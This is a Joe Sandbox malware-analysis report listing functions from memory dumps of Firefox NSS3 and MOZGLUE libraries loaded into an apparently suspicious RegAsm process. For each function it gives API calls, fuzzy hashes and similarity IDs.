Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 953cd4595feea7b7919ef661264fec65c2cc55595ca0f16869b03468a65269b4
Instruction ID: 0febf7da5b8345621eb8afd5a1c50d3bde57d2dd6fb884240f679087bc458bce
Opcode Fuzzy Hash: 953cd4595feea7b7919ef661264fec65c2cc55595ca0f16869b03468a65269b4
Instruction Fuzzy Hash: 7461E031A007409BDB21DF29C880BDEB7B1BF8A308F44851CED8A57B01EB35E959CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CDACCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CDAC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CDADAE2,?), ref: 6CDAC6C2

PR_Now.NSS3 ref: 6CDACD35

Part of subcall function 6CE09DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CE50A27), ref: 6CE09DC6
Part of subcall function 6CE09DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CE50A27), ref: 6CE09DD1
Part of subcall function 6CE09DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE09DED

Part of subcall function 6CD96C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CD41C6F,00000000,00000004,?,?), ref: 6CD96C3F

PR_GetCurrentThread.NSS3 ref: 6CDACD54

Part of subcall function 6CE09BF0: TlsGetValue.KERNEL32(?,?,?,6CE50A75), ref: 6CE09C07

Part of subcall function 6CD97260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CD41CCC,00000000,00000000,?,?), ref: 6CD9729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CDACD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CDACE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CDACE2C

Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA10F3
Part of subcall function 6CDA10C0: EnterCriticalSection.KERNEL32(?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA110C
Part of subcall function 6CDA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1141
Part of subcall function 6CDA10C0: PR_Unlock.NSS3(?,?,?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA1182
Part of subcall function 6CDA10C0: TlsGetValue.KERNEL32(?,6CD48802,00000000,00000008,?,6CD3EF74,00000000), ref: 6CDA119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6CDACE40

Part of subcall function 6CDA14C0: TlsGetValue.KERNEL32 ref: 6CDA14E0
Part of subcall function 6CDA14C0: EnterCriticalSection.KERNEL32 ref: 6CDA14F5
Part of subcall function 6CDA14C0: PR_Unlock.NSS3 ref: 6CDA150D

Part of subcall function 6CDACEE0: PORT_ArenaMark_Util.NSS3(?,6CDACD93,?), ref: 6CDACEEE
Part of subcall function 6CDACEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CDACD93,?), ref: 6CDACEFC
Part of subcall function 6CDACEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CDACD93,?), ref: 6CDACF0B
Part of subcall function 6CDACEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CDACD93,?), ref: 6CDACF1D

Part of subcall function 6CDACEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CDACD93,?), ref: 6CDACF47
Part of subcall function 6CDACEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CDACD93,?), ref: 6CDACF67
Part of subcall function 6CDACEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CDACD93,?,?,?,?,?,?,?,?,?,?,?,6CDACD93,?), ref: 6CDACF78

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 949b191865db4c6b4b068fea63145b8da4f10947900c3c2d15e55a45b0ebc27c
Instruction ID: 3e533f7f7e63ad95023ad3daa06c94d2351bb6d5e8afeb33903689614a52515f
Opcode Fuzzy Hash: 949b191865db4c6b4b068fea63145b8da4f10947900c3c2d15e55a45b0ebc27c
Instruction Fuzzy Hash: 2A51B5B6A01104DFEB10DFA9DC40B9A77F4EF88368F250524D95597760EB32EA06CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CC19F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC19FDB
free.MOZGLUE(?,?), ref: 6CC19FF0
free.MOZGLUE(?,?), ref: 6CC1A006
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC1A0BE
free.MOZGLUE(?,?), ref: 6CC1A0D5
free.MOZGLUE(?,?), ref: 6CC1A0EB

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 8965304b012c5b3b30786218a4e7725de72108be08e7dfbb1a05d60dbbe06a6a
Instruction ID: 1cb57f7113ed29b23f1cb481cd747a734bb1b17eb5025a2fe8524aa5f03ac0be
Opcode Fuzzy Hash: 8965304b012c5b3b30786218a4e7725de72108be08e7dfbb1a05d60dbbe06a6a
Instruction Fuzzy Hash: 6A6191755087419FC711CF19C48056AB3F5FFC8368F548659E8999BB02E731E98ACBC1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD7EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CD7EF38

Part of subcall function 6CD69520: PK11_IsLoggedIn.NSS3(00000000,?,6CD9379E,?,00000001,?), ref: 6CD69542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6CD7EF53

Part of subcall function 6CD84C20: TlsGetValue.KERNEL32 ref: 6CD84C4C
Part of subcall function 6CD84C20: EnterCriticalSection.KERNEL32(?), ref: 6CD84C60
Part of subcall function 6CD84C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CD84CA1
Part of subcall function 6CD84C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CD84CBE
Part of subcall function 6CD84C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CD84CD2
Part of subcall function 6CD84C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD84D3A

PR_GetCurrentThread.NSS3 ref: 6CD7EF9E

Part of subcall function 6CE09BF0: TlsGetValue.KERNEL32(?,?,?,6CE50A75), ref: 6CE09C07

free.MOZGLUE(00000000), ref: 6CD7EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CD7F016
free.MOZGLUE(00000000), ref: 6CD7F022

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 87a482acea6936dd4deef38f4f9730550f65fcaee5706391570cf935df54aa46
Instruction ID: 16ee7661a9e20343ed32f97ccfb646132093e42f41a3a8e0e678bbf2922d4c5e
Opcode Fuzzy Hash: 87a482acea6936dd4deef38f4f9730550f65fcaee5706391570cf935df54aa46
Instruction Fuzzy Hash: 93419FB1E00209AFDF119FA9DC85BEE7BB9AF48358F044029F914A7760E771C9158BB1

Uniqueness

Uniqueness Score: -1.00%

Function 6CD52E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6CD42D1A), ref: 6CD52E7E

Part of subcall function 6CDA07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CD48298,?,?,?,6CD3FCE5,?), ref: 6CDA07BF
Part of subcall function 6CDA07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CDA07E6
Part of subcall function 6CDA07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CDA081B
Part of subcall function 6CDA07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CDA0825

PR_Now.NSS3 ref: 6CD52EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6CD52EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6CD42D1A), ref: 6CD52F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CD42D1A), ref: 6CD52F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CD52F81

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: d12d948d03c903822b479246a38dad403ae5dba68f9d25a21d2cffc8f443778f
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: 7E310471601100C6EF10C756EC48BAFB2A5EB8131CFA44579D42A97AF0EB32D86EC661

Uniqueness

Uniqueness Score: -1.00%

Function 6CC1DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CC1DC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6CC1D38A,?), ref: 6CC1DC6F
free.MOZGLUE(?,?,?,?,?,6CC1D38A,?), ref: 6CC1DCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CC1D38A,?), ref: 6CC1DCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CC1D38A,?), ref: 6CC1DD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CC1D38A,?), ref: 6CC1DD4A

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 4f65d0e362b998f13b4968e70067452cb3ebcdadc6b41e3110b4fa91089c43a6
Instruction ID: e6ed38013d7db01f62884c1b2cd8b9848400f4037a5d842b591cd8a810bdb57f
Opcode Fuzzy Hash: 4f65d0e362b998f13b4968e70067452cb3ebcdadc6b41e3110b4fa91089c43a6
Instruction Fuzzy Hash: 75415CB5A00605DFCB00DF9AC89099EB7F5FF89318B5545A9D945A7B10E731FC04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6CD40E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6CD40A2C), ref: 6CD40E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6CD40A2C), ref: 6CD40E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6CD40A2C), ref: 6CD40E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6CD40A2C), ref: 6CD40E90
free.MOZGLUE(00000000), ref: 6CD40EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6CD40A2C), ref: 6CD40ED9

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: f2e6e17d0ae837ea6501e404f3845060d40d180412c14a0c75bd5222132ad878
Instruction ID: 4b2e424dcf24caf0fd2397f6284535f754d8e80c84f973d71ff74aa6daa2c34c
Opcode Fuzzy Hash: f2e6e17d0ae837ea6501e404f3845060d40d180412c14a0c75bd5222132ad878
Instruction Fuzzy Hash: 33212E72A00285D7EB004B769C45F6772AEDFE16C9F198435DA1863A31EA61E83582E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CC06590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6CBFFA80: GetCurrentThreadId.KERNEL32 ref: 6CBFFA8D
Part of subcall function 6CBFFA80: AcquireSRWLockExclusive.KERNEL32(6CC4F448), ref: 6CBFFA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC06727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CC067C8

Part of subcall function 6CC14290: memcpy.VCRUNTIME140(?,?,6CC22003,6CC20AD9,?,6CC20AD9,00000000,?,6CC20AD9,?,00000004,?,6CC21A62,?,6CC22003,?), ref: 6CC142C4

Strings

data, xrefs: 6CC06593

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data
API String ID: 511789754-2918445923
Opcode ID: 158195fde24df868bc8c6b1f28c0a16350f1ee84d6010f26db2956ff17df160f
Instruction ID: 6992aed164a47ea4f5a4604f7e6b5d00ab84d2f93f77d945ba2733ee7586b0f2
Opcode Fuzzy Hash: 158195fde24df868bc8c6b1f28c0a16350f1ee84d6010f26db2956ff17df160f
Instruction Fuzzy Hash: BFD1BD75A087408FD724DF25D851B9FB7F5AFC5308F10892DE48987B51EB31A889CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CD4AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CD4AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6CD4AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CD4AEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6CD4AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6CE69500), ref: 6CD4AF23

Part of subcall function 6CD9F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CD9F0C8
Part of subcall function 6CD9F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CD9F122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CD4AF37

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: f6bdcc50e04f11df7f8731515c0a544da7a233029e5764bf0dd50039f9ff9fe1
Instruction ID: 76a2ee44ff89d8f17231290e329817979321156f0540d103746c4c3584354594
Opcode Fuzzy Hash: f6bdcc50e04f11df7f8731515c0a544da7a233029e5764bf0dd50039f9ff9fe1
Instruction Fuzzy Hash: 33213AB1909200ABE7108F188C01B9B7BE4AF8572CF148329FD689B7E1E731D90587B3

Uniqueness

Uniqueness Score: -1.00%

Function 6CDCEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CDCEE85
realloc.MOZGLUE(91FBCEEB,?), ref: 6CDCEEAE
PORT_Alloc_Util.NSS3(?), ref: 6CDCEEC5

Part of subcall function 6CDA0BE0: malloc.MOZGLUE(6CD98D2D,?,00000000,?), ref: 6CDA0BF8
Part of subcall function 6CDA0BE0: TlsGetValue.KERNEL32(6CD98D2D,?,00000000,?), ref: 6CDA0C15

htonl.WSOCK32(?), ref: 6CDCEEE3
htonl.WSOCK32(00000000,?), ref: 6CDCEEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6CDCEF01

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: 2daaff7f5a542c24bd76bddeca8e25e897fcc8b6eec47338a2c75f4188d226a6
Instruction ID: 5f2906e1eb439e8c388de9c10bbca65a4a98a19a376102bf211b1ed6e7fb77b2
Opcode Fuzzy Hash: 2daaff7f5a542c24bd76bddeca8e25e897fcc8b6eec47338a2c75f4188d226a6
Instruction Fuzzy Hash: F421D671A002149FCB109F28DC8179A77BCEF45398F148129ED199BA51D331ED14C7E7

Uniqueness

Uniqueness Score: -1.00%

Function 6CD7EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CD7EE49

Part of subcall function 6CD9FAB0: free.MOZGLUE(?,-00000001,?,?,6CD3F673,00000000,00000000), ref: 6CD9FAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CD7EE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6CD7EE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6CD7EE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CD7EEB3

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: 98d8a84402fd8e6263005e069977e8bc4ca74024b02d7a6b6c2a58dc75eff27a
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 442193BAA00210AFEB218F59DC81EABB7A8AB45718F044564FD089BB61E771DC14C7F1

Uniqueness

Uniqueness Score: -1.00%

Function 6CBFD5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CBCEB57,?,?,?,?,?,?,?,?,?), ref: 6CBFD652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CBCEB57,?), ref: 6CBFD660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CBCEB57,?), ref: 6CBFD673
free.MOZGLUE(?), ref: 6CBFD888

Strings

|Enabled, xrefs: 6CBFD81E

Memory Dump Source

Source File: 00000004.00000002.2412300207.000000006CBC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CBC0000, based on PE: true

Associated: 00000004.00000002.2412272729.000000006CBC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412533246.000000006CC3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412586168.000000006CC4E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.2412609993.000000006CC52000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6cbc0000_RegAsm.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: |Enabled
API String ID: 4142949111-2633303760
Opcode ID: 82f60574fc1e083398b254e0cbb4cc7c81307ea5e1917fe6ce5b7f834102049c
Instruction ID: 4fffcbf2328eb2085490b3a32b8479298e98ac517fbdc076dafe507fb7209a41
Opcode Fuzzy Hash: 82f60574fc1e083398b254e0cbb4cc7c81307ea5e1917fe6ce5b7f834102049c
Instruction Fuzzy Hash: 4AA1F670A003889FDB11CF79D4907AEBBF1EF49318F14815CD8A96B741D735A94ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6CD2AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CD2AFDA

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CD2AFC4
misuse, xrefs: 6CD2AFCE
unable to delete/modify collation sequence due to active statements, xrefs: 6CD2AF5C
%s at line %d of [%.10s], xrefs: 6CD2AFD3

Memory Dump Source

Source File: 00000004.00000002.2412659173.000000006CCC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CCC0000, based on PE: true

Associated: 00000004.00000002.2412639409.000000006CCC0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413390971.000000006CE5F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413523450.000000006CE9E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413549858.000000006CE9F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413572139.000000006CEA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2413587501.000000006CEA5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ccc0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
